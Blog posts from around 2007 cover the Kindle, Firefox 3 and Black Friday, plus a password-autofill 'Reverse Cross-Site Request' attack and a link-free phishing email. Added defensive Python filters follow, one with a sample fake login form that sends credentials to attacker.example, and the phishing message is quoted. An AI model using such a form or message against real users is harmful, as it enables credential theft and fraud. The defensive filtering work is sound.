Forklift Driver Klaus (a.k.a. Staplerfahrer Klaus): a parody of work safety films in which a forklift driver blunders through his first day on the job, maiming fellow employees left and right. German with English subtitles. (via TV Tropes: Scare Em Straight)

And, on a more serious note, the Internet Storm Center is reporting on people finding malware pre-installed on digital picture frames, memory cards, etc. Something to watch out for with portable devices that can connect to your computer.

Firefox 3 Beta 1 is out. Nice so far. Oddly enough, it runs better than the current Opera 9.5 previews on my old Linux box at work, though that mostly seems to be the fault of the find-in-history option.

I usually avoid any sort of shopping on the day after Thanksgiving, online included, but I’ve been getting email from various online stores that are trying to get into Black Friday. Amazon is advertising a Black Friday Sale, and Apple is promoting a “special one-day shopping event” on their website—and annoyingly, neither of them is giving any clue as to what sort of deals are involved. Amazon keeps forwarding me to today’s deals, and Apple just says something’s coming. And neither site lists actual hours. Is it midnight to midnight? What time zone?

Speaking of Amazon, their entire home page is currently taken up by the announcement of their new eBook reader, Kindle. At $400 I’m not going to rush out and buy one, but it looks like they’ve solved some of the main e-book problems: it’s small, light and wireless, and they even bring up the reading-in-bed issue in the intro. The real question is going to be compatibility & openness: It’ll read plain text, HTML, Word, and a few other document formats (and they’re promoting its access to Wikipedia), so it should be possible for other stores to sell books for the device. And what about the e-book offerings themselves? Will they be loaded down with draconian digital rights management like the Adobe ebooks of a few years ago, or are they following the model of Amazon’s MP3 store?* In a nice change, their music downloads are entirely DRM-free and they use it as a selling point. Edit: Per Andrea’s comments and further research, Kindle ebooks are locked down with DRM. No, thanks!

The name, however, makes me wonder how soon they’ll offer Fahrenheit 451.

Finally, the Internet Storm Center has an insightful response to the statement, “There is nothing on my computer that a hacker would be interested in.” Let’s leave aside the question of your personal data for the moment. Just the fact that you’ve got a computer with an internet connection could prove very useful to someone who wants to cover their tracks or just add more power to their own distributed system.

* Amazon’s MP3 store is also surprisingly cheap. I replaced my old tapes of the original cast recordings of Les Misérables (Broadway) and Phantom Of The Opera for $9 each—they run upwards of $30 on CD.

ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed “Reverse Cross-Site Request,” or RCSR.

Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.

What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.
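The hosting side is where the plain-HTML angle bites: a blog host that strips scripts but passes `<form>` and `<input>` through will happily render the look-alike login box. As an added illustration (not code from ISC, Chapin Information Services or Mozilla), here is a small Python filter built on the standard library's `html.parser` that audits a user-submitted HTML fragment for form elements and returns a copy with them removed. The sample comment, the `attacker.example` action URL and the choice to strip rather than reject are all constructed assumptions for the example.

```python
"""Server-side filter for user-generated HTML that catches login-form look-alikes.

Added illustration, not code from the ISC post, Chapin Information Services
or Mozilla. It assumes the hosting site accepts a restricted HTML subset
from users (as most blog hosts do) and wants to refuse or strip the
plain-HTML elements a fake login form needs: <form>, <input> (notably
type=password and the image submit button) and <button>.
"""
from html.parser import HTMLParser

# Elements with no business in a blog comment or post body: they are what a
# browser needs to render (and auto-fill) a fake login form.
FORM_TAGS = {"form", "input", "button", "select", "textarea"}
# Input types that are the most telling on their own.
RISKY_INPUT_TYPES = {"password", "image", "submit"}


class FormAuditor(HTMLParser):
    """Walks user-supplied HTML, records form-related elements and builds a
    copy of the markup with every such element (and anything inside a
    <form>) removed."""

    def __init__(self):
        # convert_charrefs=False so entities are passed through untouched
        super().__init__(convert_charrefs=False)
        self.findings = []    # human-readable descriptions of what was found
        self.cleaned = []     # fragments of the filtered markup
        self._form_depth = 0  # >0 while inside <form> ... </form>

    def _note(self, what):
        line, col = self.getpos()
        self.findings.append(f"line {line}, col {col}: {what}")

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._form_depth += 1
            self._note(f"<form> with action={attrs.get('action')!r}")
            return
        if tag in FORM_TAGS:
            itype = (attrs.get("type") or "text").lower()
            if tag == "input" and itype in RISKY_INPUT_TYPES:
                self._note(f"<input type={itype}> name={attrs.get('name')!r}")
            else:
                self._note(f"<{tag}> element")
            return  # dropped from the cleaned copy
        if self._form_depth == 0:
            self.cleaned.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        # <input ... /> style self-closing tags take the same path
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_depth = max(0, self._form_depth - 1)
            return
        if tag in FORM_TAGS:
            return
        if self._form_depth == 0:
            self.cleaned.append(f"</{tag}>")

    def handle_data(self, data):
        if self._form_depth == 0:
            self.cleaned.append(data)

    def handle_entityref(self, name):
        if self._form_depth == 0:
            self.cleaned.append(f"&{name};")

    def handle_charref(self, name):
        if self._form_depth == 0:
            self.cleaned.append(f"&#{name};")


def audit_user_html(fragment):
    """Return (findings, cleaned_html) for one piece of user-generated HTML."""
    auditor = FormAuditor()
    auditor.feed(fragment)
    auditor.close()
    return auditor.findings, "".join(auditor.cleaned)


# Constructed sample: a comment that imitates the host's own login box.
SAMPLE_COMMENT = (
    "<p>Great post!</p>"
    '<form action="http://attacker.example/collect" method="post">'
    'Username: <input type="text" name="user"><br>'
    'Password: <input type="password" name="pass"><br>'
    '<input type="image" src="spacer.gif" alt="">'
    "</form>"
    "<p>Cheers &amp; thanks</p>"
)

if __name__ == "__main__":
    found, cleaned = audit_user_html(SAMPLE_COMMENT)
    for f in found:
        print("REJECT:", f)
    print("cleaned:", cleaned)
```

A tokenizer pass like this is not a full HTML sanitizer; a host would normally run it after its existing allow-list filter and reject the submission outright when `findings` is non-empty rather than silently stripping, since the author of a comment containing a password field is not someone whose markup you want to repair.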

Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if the fake form is on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”

At the moment, I’m glad I don’t let web browsers save my passwords.

Received the replacement battery for the PowerBook yesterday. It was shipped out via DHL, with a prepaid return label for shipping the old battery back via regular mail.

Last night I drained the old battery, plugged the new one in, and packaged up the recalled one in the box. At lunch today I went to the post office to send it off.

As I was walking up the steps, I remembered the “Does this package contain anything liquid, explosive, or otherwise hazardous?” question that postal clerks are required to ask. If you’re mailing a defective battery that could theoretically burst into flames, how exactly are you supposed to answer?

I figured it would be best not to joke about it.

As it was, I just said it was a laptop battery straight out, so the question didn’t come up.

I just spotted a rather disturbing phishing message in (of all places) our abuse contact mailbox:

Subject: Fraud Prevention Measures

Dear customer!

Due to high fraud activity we constantly increasing security level both for online banking and card transactions. In order to update our records you are required to call MBNA Card Service number at 1-800-[removed] and update information on your MBNA card.

This is free of charge and would not affect any transactions with your card. Please note this is necessary to provide highest security level for all transactions with your card.

No HTML tricks. No links to fraudulent websites. Just a phone number.

I can only assume this is a response to the high-profile inclusion of antiphishing features in Internet Explorer 7 and in Firefox 2. If there’s no website, there’s nothing for a web browser to check.

And of course by not using sneaky technical tricks in the message, it’s harder for tools like ClamAV, spam filters, or mail clients to detect.
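What a filter can still look at is the shape of the message itself: a generic salutation, fraud or urgency language, an instruction to call a number, and no URL at all. As an added example (not from the blog, ClamAV or any other tool it names), here is a small Python scorer for that pattern. The cue list, weights and threshold are illustrative assumptions; the two sample messages are constructed, the first modelled on the message quoted above with a fictional 555 number in place of the removed one.

```python
"""Heuristic flag for 'call this number' phishing that carries no links.

Added example, not from the blog or any of the tools it mentions. Cue
regexes, weights and the threshold are assumed values to be tuned against
real mail; the sample messages below are constructed.
"""
import re

# North American style number, with or without a leading 1; loose on separators
# so 800-555-0100, (800) 555 0100 and 1.800.555.0100 all match.
PHONE_CORE = r"\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}"
PHONE_RE = re.compile(r"(?<!\d)(?:1[\s.-]?)?" + PHONE_CORE + r"(?!\d)")
URL_RE = re.compile(r"(?:https?://|www\.)\S+", re.I)

# Each cue is (description, regex, weight). Weights are assumed.
CUES = [
    ("urgency / fraud framing",
     re.compile(r"\b(fraud|suspend(ed)?|unauthori[sz]ed|immediately|required to)\b", re.I), 2),
    ("asks recipient to call a number",
     re.compile(r"\b(call|phone|dial)\b[^.\n]{0,60}?(number|" + PHONE_CORE + r")", re.I), 3),
    ("asks to update or verify account details",
     re.compile(r"\b(update|verify|confirm)\b[^.\n]{0,40}\b(information|records|details|account|card)\b", re.I), 2),
    ("generic salutation",
     re.compile(r"^\s*dear\s+(customer|client|member|user)\b", re.I | re.M), 1),
    ("reassurance that the call is free / harmless",
     re.compile(r"\b(free of charge|toll[\s-]?free|would not affect)\b", re.I), 1),
]

FLAG_THRESHOLD = 6  # assumed; tune against real mail volume


def score_message(subject, body):
    """Return (score, reasons, phone_numbers) for one message."""
    text = f"{subject}\n{body}"
    reasons, score = [], 0
    for desc, rx, weight in CUES:
        if rx.search(text):
            reasons.append(desc)
            score += weight
    phones = [m.group(0) for m in PHONE_RE.finditer(text)]
    if phones and not URL_RE.search(text):
        # A phone number as the only call to action is exactly the pattern
        # that sidesteps URL-based browser and filter checks.
        reasons.append("phone number present, no URL")
        score += 2
    return score, reasons, phones


def is_suspicious(subject, body):
    return score_message(subject, body)[0] >= FLAG_THRESHOLD


# Constructed sample modelled on the quoted message; 555 number is fictional.
PHISH_SUBJECT = "Fraud Prevention Measures"
PHISH_BODY = (
    "Dear customer!\n\n"
    "Due to high fraud activity we constantly increasing security level both "
    "for online banking and card transactions. In order to update our records "
    "you are required to call MBNA Card Service number at 1-800-555-0100 and "
    "update information on your MBNA card.\n\n"
    "This is free of charge and would not affect any transactions with your card."
)

# Constructed benign message: has a phone number, but also a URL and no urgency cues.
LEGIT_SUBJECT = "Your order has shipped"
LEGIT_BODY = (
    "Hello,\n\nYour order #4812 shipped today. Track it at "
    "https://shop.example/track/4812 or call us at (800) 555-0199 with any questions."
)

if __name__ == "__main__":
    for subj, body in ((PHISH_SUBJECT, PHISH_BODY), (LEGIT_SUBJECT, LEGIT_BODY)):
        score, reasons, phones = score_message(subj, body)
        print(f"{subj!r}: score={score} flagged={score >= FLAG_THRESHOLD}")
        for r in reasons:
            print("   -", r)
```

The point of the "phone number but no URL" rule is that a legitimate shipping notice with a support line still carries a link somewhere, while a message whose only action is a phone call has nothing for the browser-side checks to inspect, so the mail layer has to carry that weight.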

Incidentally, does anyone else find it ironic that one of the most common phishing techniques is to exploit people’s fear of being phished?

Further reading: Anti-Phishing Working Group.